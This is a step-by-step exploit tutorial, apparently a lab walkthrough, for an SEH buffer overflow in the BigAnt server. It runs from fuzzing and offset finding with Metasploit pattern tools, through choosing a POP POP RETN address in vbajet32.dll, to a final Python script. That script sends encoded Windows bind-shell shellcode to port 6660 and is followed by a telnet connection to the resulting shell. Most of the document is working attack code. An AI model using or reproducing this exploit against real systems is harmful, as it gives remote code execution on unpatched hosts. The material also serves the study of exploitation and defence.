Make fuzzer
#!/usr/bin/python
import socket
# "USV " command followed by 2500 'A' bytes and the terminator
buffer = "USV " + "\x41" * 2500 + "\r\n\r\n"
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("192.168.56.101", 6660))  # BigAnt server
sock.send(buffer)
sock.close()
The application crashes, but EIP is not overwritten by the buffer we sent, because the program has an SEH handler that takes over when the overflow happens. We can check this in OllyDbg by clicking View --> SEH chain.
To pass the exception on to the SEH handler (and so reach the overwritten handler address), press Shift+F9.
Get POP POP RETN
We need a POP POP RETN address to overwrite the SEH handler address in the application, so we use View --> Executable modules.
Using OllyDbg, click View --> Executable modules and double-click vbajet32.dll. Once inside the CPU window for vbajet32.dll, right-click, choose Search for --> Sequence of commands, fill in POP r32 / POP r32 / RETN and click Find. This gives us the address of that sequence in the memory of vbajet32.dll.
create pattern offset
To find how many bytes it takes to reach the SEH record, we use pattern_create from Metasploit and load the generated characters into the buffer.
root@bt:/pentest/exploits/framework/tools# ./pattern_create.rb 2500 > Big.txt
#!/usr/bin/python
import socket
buffer = "USV "
# output of pattern_create.rb 2500 (Big.txt), one line per leading letter
buffer+= ("Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9"
"Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9"
"Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9"
"Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2D")
buffer+= "\r\n\r\n"
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("192.168.56.101", 6660))
sock.send(buffer)
sock.close()
Restart OllyDbg and the BigAnt server, then run it again with the new fuzzer; press Shift+F9 to pass the exception on. To find the offset in the buffer we use pattern_offset with the value that landed in the SEH handler.
root@bt:/pentest/exploits/framework/tools# ./pattern_offset.rb 42326742
966
So the SEH handler is reached after 966 bytes of our buffer. Now we put that into the fuzzer:
#!/usr/bin/python
import socket
buffer = "USV "
buffer+= "\x90" * 962                    # padding up to the SEH record
buffer+= "\xcc\xcc\xcc\xcc"              # next-SEH pointer (offset 962)
buffer+= "\x41\x41\x41\x41"              # SEH handler (offset 966), should show up as 41414141
buffer+= "\x90" * (2504 - len(buffer))   # pad to the original 2504-byte length
buffer+= "\r\n\r\n"
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("192.168.56.101", 6660))
sock.send(buffer)
sock.close()
After that, restart OllyDbg and the BigAnt server and run the fuzzer again. The BigAnt server crashes and the \x41 bytes overwrite the SEH handler.
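To see why pattern_offset.rb answers 966, here is an added Python 3 reimplementation of what pattern_create.rb and pattern_offset.rb do (my own code, not from the original post or from Metasploit): the pattern is a sequence of unique Upper/lower/digit triples, and the dword OllyDbg shows in the handler, 0x42326742, is the little-endian bytes "Bg2B" found at offset 966. Function names are my own.

```python
import string
import struct

# Alphabets used by Metasploit's pattern_create.rb: every 3-byte triple is
# <Upper><lower><digit>, so 26*26*10 = 6760 triples (20280 bytes) are unique.
UPPER = string.ascii_uppercase
LOWER = string.ascii_lowercase
DIGITS = string.digits


def pattern_create(length):
    """Return the first `length` bytes of the cyclic pattern."""
    pat = bytearray()
    for u in UPPER:
        for l in LOWER:
            for d in DIGITS:
                pat += (u + l + d).encode()
                if len(pat) >= length:
                    return bytes(pat[:length])
    raise ValueError("pattern only has 20280 unique bytes")


def pattern_offset(value_hex, length=2500):
    """Offset in the pattern of the dword the debugger showed, e.g. '42326742'.

    OllyDbg prints the dword big-endian, but x86 stores it little-endian, so
    0x42326742 is the bytes 42 67 32 42 = b'Bg2B' in memory. Like
    pattern_offset.rb we try the little-endian form first, then the raw byte
    order, and return -1 if neither occurs (e.g. a value that is not ours).
    """
    pat = pattern_create(length)
    value = int(value_hex, 16)
    for needle in (struct.pack("<I", value), struct.pack(">I", value)):
        idx = pat.find(needle)
        if idx >= 0:
            return idx
    return -1


def seh_offsets(handler_offset):
    """Split the handler offset into the two fields of the 8-byte SEH record.

    The next-SEH pointer sits 4 bytes before the handler pointer, which is
    why the fuzzer above uses 962 bytes of padding, 4 bytes for nSEH and
    then 4 bytes that land on the handler at offset 966.
    """
    return handler_offset - 4, handler_offset


if __name__ == "__main__":
    off = pattern_offset("42326742")   # value from the crash on this page
    print("handler offset:", off, "nSEH/SEH:", seh_offsets(off))
```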
Controlling the CPU process
Now that we know the offset that overwrites the SEH handler, we load the address from vbajet32.dll that contains POP POP RETN into the fuzzer:
#!/usr/bin/python
import socket
buffer = "USV "
buffer+= "\x90" * 962                    # padding up to the SEH record
buffer+= "\xcc\xcc\xcc\xcc"              # next-SEH pointer
buffer+= "\x6A\x19\x9A\x0F"              # SEH handler: POP POP RETN in vbajet32.dll (0x0F9A196A)
buffer+= "\x90" * (2504 - len(buffer))
buffer+= "\r\n\r\n"
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("192.168.56.101", 6660))
sock.send(buffer)
sock.close()
Before we run the BigAnt server we need to set a breakpoint on the SEH handler address, to make sure our exploit really lands on the right target; then run the fuzzer.
Press Shift+F9 to continue into vbajet32.dll and F7 to single-step through to the RETN.
But now we have a problem: there are only about 4 bytes of space here, which is not enough to hold the shellcode, so we need to relocate to an address with more room. Right-click on 015FFD7C, then "Follow in Dump" --> "Selection".
Generate shellcode
We will use msfweb:
root@bt:/pentest/exploits/framework2# ./msfweb
+----=[ Metasploit Framework Web Interface (127.0.0.1:55555)
then open it in the browser.
I will use the Windows bind shell payload to generate the shellcode.
Then we reload the shellcode into the fuzzer, making sure it contains no bad characters. We must check that the shellcode is free of bad characters, which we do manually by sending the fuzzer row by row. Once the shellcode is clear of bad characters, the final fuzzer looks like this:
#!/usr/bin/python
import socket
buffer = "USV "
buffer+= "\x90" * 962                    # padding up to the SEH record
buffer+= "\xeb\x06\x90\x90"              # next-SEH pointer: short jump of 6 bytes past the handler address
buffer+= "\x6A\x19\x9A\x0F"              # SEH handler: POP POP RETN in vbajet32.dll (0x0F9A196A)
buffer+= "\x90" * 32                     # NOP sled in front of the shellcode
buffer+= ("\xdd\xc5\xb8\x4a\x27\x71\x35\x33\xc9\xb1\x51\xd9\x74\x24\xf4\x5e"
"\x83\xc6\x04\x31\x46\x13\x03\x0c\x34\x93\xc0\x6c\x50\xb8\x66\x64"
"\x5c\xc1\x86\x8b\xff\xb5\x15\x57\x24\x41\xa0\xab\xaf\x29\x2e\xab"
"\xae\x3e\xbb\x04\xa9\x4b\xe3\xba\xc8\xa0\x55\x31\xfe\xbd\x67\xab"
"\xce\x01\xfe\x9f\xb5\x42\x75\xd8\x74\x88\x7b\xe7\xb4\xe6\x70\xdc"
"\x6c\xdd\x50\x57\x68\x96\xfe\xb3\x73\x42\x66\x30\x7f\xdf\xec\x19"
"\x9c\xde\x19\xa6\xb0\x6b\x54\xc4\xec\x77\x06\xd7\xdc\x5c\xac\x5c"
"\x5d\x53\xa6\x22\x6e\x18\xc8\xbe\xc3\x95\x69\xb6\x45\xc2\xe7\x88"
"\x77\xfe\xa8\xeb\x5e\x98\x1b\x75\x37\x56\xae\x11\xb0\xeb\xfc\xbe"
"\x6a\xf3\xd1\x28\x58\xe6\x2e\x93\x0e\x06\x18\xbc\x27\x1d\xc3\xc3"
"\xd5\xd6\x0e\x96\x4f\xe5\xf1\xc8\xf8\x30\x04\x1d\x55\x95\xe8\x0b"
"\xf5\x49\x44\xe0\xa9\x2e\x39\x45\x1d\x4e\x6d\x2f\xc9\xa1\xd2\xc9"
"\x5a\x4b\x0b\x80\x35\xef\xd6\xda\x02\xb8\x19\xcc\xe7\x57\xb7\xa5"
"\x08\x87\x5f\xe1\x5a\x06\x49\xbe\x5b\x81\xda\x15\x5b\xfe\xb5\x70"
"\xea\x79\x0c\x2d\x12\x53\xdf\x85\xb8\x09\x1f\xf5\xd2\xda\x38\x8c"
"\x12\x63\x90\x91\x4d\xc1\xe1\xbd\x14\x80\x79\x5b\xb1\x37\xef\x2a"
"\xa4\xd2\xbf\x75\x0e\xef\xc9\x62\x3a\xab\x40\x8e\x8a\xf3\xa0\xe4"
"\x13\xb1\x6b\x06\xa9\x1a\xe7\x7b\x54\x5b\xac\x28\x02\xf3\xc0\xd0"
"\xe6\x12\xda\x59\x4d\xe4\xf2\xfa\x1a\x48\xaa\xad\xf5\x06\x4d\x1c"
"\xa7\x83\x1c\x61\x97\x44\x32\x44\x1d\x5b\x1f\x89\xc8\x09\x5f\x8a"
"\xc2\x32\x4f\xff\x7a\x31\xf3\x3b\xe0\x36\x22\x91\x16\x18\xa3\xe5"
"\x63\x9d\x6b\x56\x8b\x48\x6c\x88")
buffer+= "\x90" * (2504 - len(buffer))
buffer+= "\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("192.168.56.101",6660))
sock.send(buffer)
sock.close()
Running the payload
To run the payload, start the BigAnt server, then send the fuzzer and connect to the bind shell with telnet.